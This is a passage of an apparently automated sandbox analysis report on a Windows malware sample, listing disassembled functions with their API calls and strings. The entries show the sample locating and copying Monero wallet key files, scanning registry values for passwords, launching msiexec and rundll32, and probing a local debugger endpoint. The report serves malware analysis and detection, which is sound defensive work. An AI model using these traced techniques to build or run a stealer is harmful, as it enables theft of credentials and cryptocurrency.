                                                                                                                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155D3
                                                                                                                                                • Part of subcall function 00415510: strtok.MSVCRT(00000000,?), ref: 004155EE
                                                                                                                                                • Part of subcall function 00415510: lstrlenA.KERNEL32(00000000), ref: 004155FE
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004159DB
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415B90
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415C5C
                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 00415C6B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpylstrlen$Sleepstrtok
                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                              • API String ID: 3630751533-2791005934
                                                                                                                                              • Opcode ID: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                                                                                                                              • Instruction ID: 55671caa9f17e02bf2b096751d64d2e50591885947f125be0164830bf8637258
                                                                                                                                              • Opcode Fuzzy Hash: 93186e085ff129a73f9e0ab74c49d77d7277fa139757a84e451318394f26fa84
                                                                                                                                              • Instruction Fuzzy Hash: 30E1A331A111049BCB14FBA1EDA6EED733EAF54304F40856EF50666091EF386B98CB5A
                                                                                                                                              Function 00413080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExecuteShell$lstrcpy
                                                                                                                                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                                                                                                              • API String ID: 2507796910-3625054190
                                                                                                                                              • Opcode ID: ad88396c8d102b61a2781464ca86b03b45dafa02e1fcea0a1b287eff349f8370
                                                                                                                                              • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                                                                                                                              • Opcode Fuzzy Hash: ad88396c8d102b61a2781464ca86b03b45dafa02e1fcea0a1b287eff349f8370
                                                                                                                                              • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                                                                                                                              Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00401327
                                                                                                                                                • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                                                                                                                • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                                                                                                                • Part of subcall function 004012A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                                                                                                                • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                                                                                                                • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0040135C
                                                                                                                                              • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,0099BC18,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                                                                                                              • memset.MSVCRT ref: 00401516
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                                                                                                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                              • API String ID: 1930502592-218353709
                                                                                                                                              • Opcode ID: a61e905b471e4000669e58a1aa69645a07506c47817eecf3a547eb8afc69e2f7
                                                                                                                                              • Instruction ID: 741fdb0546306804f524ee4e08b2aea9f849864388c8e0516508d47f484bafde
                                                                                                                                              • Opcode Fuzzy Hash: a61e905b471e4000669e58a1aa69645a07506c47817eecf3a547eb8afc69e2f7
                                                                                                                                              • Instruction Fuzzy Hash: 6B5151B1E501185BCB14EB60DD96BED733DAF54304F4045EEB20A62092EF346BD8CA6E
                                                                                                                                              Function 00409A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                                                                                                                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00409AAB
                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 00409AC7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internet$Open$CloseHandle
                                                                                                                                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                                                                                                              • API String ID: 3289985339-2144369209
                                                                                                                                              • Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                                                                                                                              • Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
                                                                                                                                              • Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                                                                                                                              • Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68
                                                                                                                                              Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                                                                                                                                • Part of subcall function 00407330: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                                                                                                                                • Part of subcall function 00407330: RegEnumValueA.KERNEL32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                                                                                                                                • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                                                                                                                                • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                                                                                                                                • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                                                                                                                              • lstrcatA.KERNEL32(2727A020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                                                                                                                              • lstrcatA.KERNEL32(2727A020,00000000,00000000), ref: 004076A8
                                                                                                                                              • lstrcatA.KERNEL32(2727A020, : ), ref: 004076BA
                                                                                                                                              • lstrcatA.KERNEL32(2727A020,00000000,00000000,00000000), ref: 004076EF
                                                                                                                                              • lstrcatA.KERNEL32(2727A020,00421934), ref: 00407700
                                                                                                                                              • lstrcatA.KERNEL32(2727A020,00000000,00000000,00000000), ref: 00407733
                                                                                                                                              • lstrcatA.KERNEL32(2727A020,00421938), ref: 0040774D
                                                                                                                                              • task.LIBCPMTD ref: 0040775B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                              • String ID: :
                                                                                                                                              • API String ID: 3191641157-3653984579
                                                                                                                                              • Opcode ID: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                                                                                                                              • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                                                                                                                              • Opcode Fuzzy Hash: b3130cf40c1dd3c7cf9147a5f31127e01731d4f473a6a07740fc976ddd9062c8
                                                                                                                                              • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                                                                                                                              Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 00407374
                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                                                                                                                              • RegEnumValueA.KERNEL32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                                                                                                                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                                                                                                                                • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                                                                                                                              • task.LIBCPMTD ref: 004075B5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                              • String ID: Password
                                                                                                                                              • API String ID: 2698061284-3434357891
                                                                                                                                              • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                                                                                                                              • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                                                                                                                              • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                                                                                                                              • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                                                                                                                              Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                                                                                                                              • wsprintfA.USER32 ref: 004177D0
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                              • String ID: :$C$\
                                                                                                                                              • API String ID: 3790021787-3809124531
                                                                                                                                              • Opcode ID: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                                                                                                                              • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                                                                                                                              • Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
                                                                                                                                              • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9
                                                                                                                                              Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,009A03D8,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,009A03D8,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                                                                                                                              • __aulldiv.LIBCMT ref: 00418302
                                                                                                                                              • __aulldiv.LIBCMT ref: 00418310
                                                                                                                                              • wsprintfA.USER32 ref: 0041833C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                              • String ID: %d MB$@
                                                                                                                                              • API String ID: 2886426298-3474575989
                                                                                                                                              • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                                                                                                                              • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                                                                                                                              • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                                                                                                                              • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9
                                                                                                                                              Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
